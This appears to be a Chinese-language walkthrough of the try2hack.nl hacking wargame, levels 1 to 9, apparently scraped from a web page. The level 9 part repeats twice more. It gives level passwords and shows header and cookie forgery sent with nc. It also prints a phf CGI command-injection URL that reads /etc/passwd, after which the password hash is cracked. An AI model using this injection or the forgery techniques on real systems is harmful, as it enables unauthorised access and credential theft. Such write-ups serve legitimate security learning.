我们先来到入口,第一关
http://www.try2hack.nl/levels/
直接察看源文件即可看到
if (passwd =="h4x0r") {
alert("Alright! On to level 2...");
location.href = "level2-xfdgnh.xHtml";
所以密码就是h4x0r,下一关地址
level2-xfdgnh.xhtml
第二关是一个flash验证
可以用flash 反编译工具,
在本地临时文件中找到该网站上的flash
可以找到原代码中有一段:
on (release) {
if ((txtUsername == "try2hack") and (txtPassWord == "irtehh4x0r!")) {
getURL ("level3-.xhtml", "_self");
}
}
所以username为try2hack, password为irtehh4x0r!
下一关地址level3-.xhtml
该关一进去 便弹出一对话框,输入错误便跳转到其它页面,在其转向的是后立刻按住停止,察看源文件,可以看到其中有
if (pwd==PASSWORD){
alert("Allright!\nEntering Level 4 ...");
location.href = CORRECTSITE;
好像这就是关键,但PASSWORD,CORRECTSITE这几个关键并没有看到被赋值
仔细找便可以发现
在这之前有<script src="javascript">这就是调用了一个文件
那我们就来到http://www.try2hack.nl/levels/JavaScript
哈哈
当中就有
PASSWORD = "try2hackrawks";
CORRECTSITE = "level4-kdnvxs.xhtml";
WRONGSITE = "http://www.disney.com";
第四关,源文件当中有<applet code="PasswdLevel4.class"
这是他调用的源文件
http://www.try2hack.nl/levels/PasswdLevel4.class
下载下来(打开要用工具),代码中其实是指向level4
打开http://www.try2hack.nl/levels/level4
源文件中有:
level5-fdvbdf.xhtml
appletking
pieceofcake
这就是答案了
http://www.try2hack.nl/levels/level5-fdvbdf.xhtml第五关
让你下载一个vb3编写的程序(运行如果提示找不到什么运行库的,去网上搜索),我先用eXeScope察看他,当中有http://www.try2hack.nl/levels/level6-ksghvb.xhtml txtUsername=AlmostAHacker txtPassword=ZqrE01A2d
难道这就是答案,你试一下就发现,这是 表面的,真的答案还得分析原代码,因为是vb3编写的,所以我们可以用工具得到其源代码,但是工具我花了很久才找到的,方便大家我就打包一起了
看这界面,很古老吧
看到了吧
真正起作用的是这些
他现在生成了源文件,我们打开来看看
If edtUsername = Mid(gc0006, 56, 1) & Mid(gc0006, 28, 1) & Mid(gc0006, 35, 1) & Mid(gc0006, 3, 1) & Mid(gc0006, 44, 1) & Mid(gc0006, 11, 1) & Mid(gc0006, 13, 1) & Mid(gc0006, 21, 1) Then
[1] [2] [3] [4]
If edtPassword = Mid(gc0006, 45, 1) & Mid(gc0006, 48, 1) & Mid(gc0006, 25, 1) & Mid(gc0006, 32, 1) & Mid(gc0006, 15, 1) & Mid(gc0006, 40, 1) & Mid(gc0006, 25, 1) & Mid(gc0006, 14, 1) & Mid(gc0006, 19, 1) Then
MsgBox "Level 6 can be found at: " & Left$(gc000A, 37) & Mid(gc0006, 21, 1) & Mid(gc0006, 14, 1) & Mid(gc0006, 29, 1) & Mid(gc0006, 32, 1) & Mid(gc0006, 12, 1) & Mid(gc0006, 14, 1) & Mid(gc000A, 44, 6), 0, "Horray!"
End
End If
End If
当中还有常量gc0006
Global Const gc0006 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~&!_$#@()[]{}<\/>"
Global Const gc000A = "http://www.try2hack.nl/levels/level6-ksghvb.xhtml"
这些都已定义了,只要编译以下就知道结果了
Try2Hack
ILoveDodi
就是这些了,你可以自己核对,编译出来
得到下一关
第六关
下载一个vb6编写的程序
要是直接破解,记得原来有人发过一个动画的,我就不重复了
我们来分析它发出的数据,可以看到到他访问了www.try2hack.nl/levels/level6.data
我们来看看这是什么
这像是一种加密算法,名字是B*C*N**N
我到处查了资料,找到了实际上,这种算法叫Baconion,详细的资料我放在一起方便大家看,
注意这里:
The Bacononian Cipher:
a AAAAA g AABBA n ABBAA t BAABA
b AAAAB h AABBB o ABBAB u-v BAABB
c AAABA i-j ABAAA p ABBBA w BABAA
d AAABB k ABAAB q ABBBB x BABAB
e AABAA l ABABA r BAAAA y BABBA
f AABAB m ABABB s BAAAB z BABBB
这样我们就可以得到
username:dabomb
password:encryptionrawks
得到第七关地址
http://www.try2hack.nl/levels/level7-xfkohc.PHP
看到提示必须用IE7.66,这还没出呢?
他是怎么知道我浏览器版本的呢?
我们看一下传送的数据
GET /levels/level7-xfkohc.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Connection: Keep-Alive
看到User-Agent,这里把信息都告诉了他
那我们来改一下,将MSIE 6.0改为MSIE 7.66
传送这些当然用nc啦
nc -vv www.try2hack.nl 80
GET /levels/level7-xfkohc.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.66; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Connection: Keep-Alive
提示:Sorry, but you must use a unix or Linux system
那我们再改
nc -vv www.try2hack.nl 80
GET /levels/level7-xfkohc.php HTTP/1.1
Accept: */*
[1] [2] [3] [4]
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.66; UNIX; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Connection: Keep-Alive
又提示Sorry, but you must get here from a link on the page:http://www.microsoft.com/ms.htm
一定要从http://www.microsoft.com/ms.htm连接到本页,那再改,添加Referer
nc -vv www.try2hack.nl 80
GET /levels/level7-xfkohc.php HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.66; UNIX; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Referer:http://www.microsoft.com/ms.htm
Host: www.try2hack.nl
Connection: Keep-Alive
如果上述操作嫌麻烦,推荐一个工具:全过程可以如下演示
得到第八关地址:level8-balnrg.xhtml
看到这个了吧 :/cgi-bin/phf
实际上这时一个cgi漏洞的标志
搜索一下就有了(要学会用搜索)
就是这里了:
http://www.try2hack.nl/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
得到了这些信息,但是密码是加了密的,我们也有解密的,看如下演示吧
看到了吧
得到root arse
输入这些
第九关:http://www.try2hack.nl/levels/level9-gnapei.php
还是让你输入信息,可是好像没有什么那样的漏洞了
还是分析传送数据
POST /levels/level9-gnapei.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-Excel, application/vnd.ms-Powerpoint, application/msword, */*
Referer: http://www.try2hack.nl/levels/level9-gnapei.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Content-Length: 51
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=no=
username=2222222&password=222222222222&submit=Enter
值得注意的是这里:
Cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=no=
凭着知觉,用户名是admin,密码是yu0aertehbomb
但是输入后出现There is a problem with your authorization. Please try again:
一定是他验证了我们的cookie,尤其是auth=no=,很明显是阻碍
我们就还得搞个cookie欺骗了
那我们就构造一下
重点是:
Cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
数据里
username=admin&password=yu0aertehbomb&submit=Enter
再提交数据
构造后的数据就是这样:
[1] [2] [3] [4]
POST /levels/level9-gnapei.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.try2hack.nl/levels/level9-gnapei.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Content-Length: 51
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
username=admin&password=yu0aertehbomb&submit=Enter
用上nc
看到了吧:Good job! You can find Level 10 at our IRC channels. Go to #try2hack.level10 on
irc.mediamonks.net or irc.deviantart.com and use 'yu0aertehbomb' as key to conti
nue. See the <a href="../chat/">chat</a> page for more information.
这就是让你用irc去irc.mediamonks.net服务器的#try2hack.level10用密码yu0aertehbomb进入,这是一关的话,我还不知道下一关怎么过呢
这是irc连接工具
要等一会
看到了吧
人挺多的
(出处:http://www.sheup.com)
[1] [2] [3] [4]
Cache-Control: no-cache
Cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=no=
username=2222222&password=222222222222&submit=Enter
值得注意的是这里:
Cookie: str_username=admin=; str_password=yu0aertehbomb=; auth=no=
凭着知觉,用户名是admin,密码是yu0aertehbomb
但是输入后出现There is a problem with your authorization. Please try again:
一定是他验证了我们的cookie,尤其是auth=no=,很明显是阻碍
我们就还得搞个cookie欺骗了
那我们就构造一下
重点是:
Cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
数据里
username=admin&password=yu0aertehbomb&submit=Enter
再提交数据
构造后的数据就是这样:
POST /levels/level9-gnapei.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.try2hack.nl/levels/level9-gnapei.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Content-Length: 51
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
username=admin&password=yu0aertehbomb&submit=Enter
用上nc
看到了吧:Good job! You can find Level 10 at our IRC channels. Go to #try2hack.level10 on
irc.mediamonks.net or irc.deviantart.com and use 'yu0aertehbomb' as key to conti
nue. See the <a href="../chat/">chat</a> page for more information.
这就是让你用irc去irc.mediamonks.net服务器的#try2hack.level10用密码yu0aertehbomb进入,这是一关的话,我还不知道下一关怎么过呢
这是irc连接工具
要等一会
看到了吧
人挺多的
(出处:http://www.sheup.com)
[1] [2] [3] [4] [5]
那我们就构造一下
重点是:
Cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
数据里
username=admin&password=yu0aertehbomb&submit=Enter
再提交数据
构造后的数据就是这样:
POST /levels/level9-gnapei.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.try2hack.nl/levels/level9-gnapei.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WHCC/0.6; .NET CLR 1.1.4322)
Host: www.try2hack.nl
Content-Length: 51
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: str_username=admin; str_password=yu0aertehbomb; auth=yes
username=admin&password=yu0aertehbomb&submit=Enter
用上nc
看到了吧:Good job! You can find Level 10 at our IRC channels. Go to #try2hack.level10 on
irc.mediamonks.net or irc.deviantart.com and use 'yu0aertehbomb' as key to conti
nue. See the <a href="../chat/">chat</a> page for more information.
这就是让你用irc去irc.mediamonks.net服务器的#try2hack.level10用密码yu0aertehbomb进入,这是一关的话,我还不知道下一关怎么过呢
这是irc连接工具
要等一会
看到了吧
人挺多的
(出处:http://www.sheup.com)
[1] [2] [3] [4] [5] [6]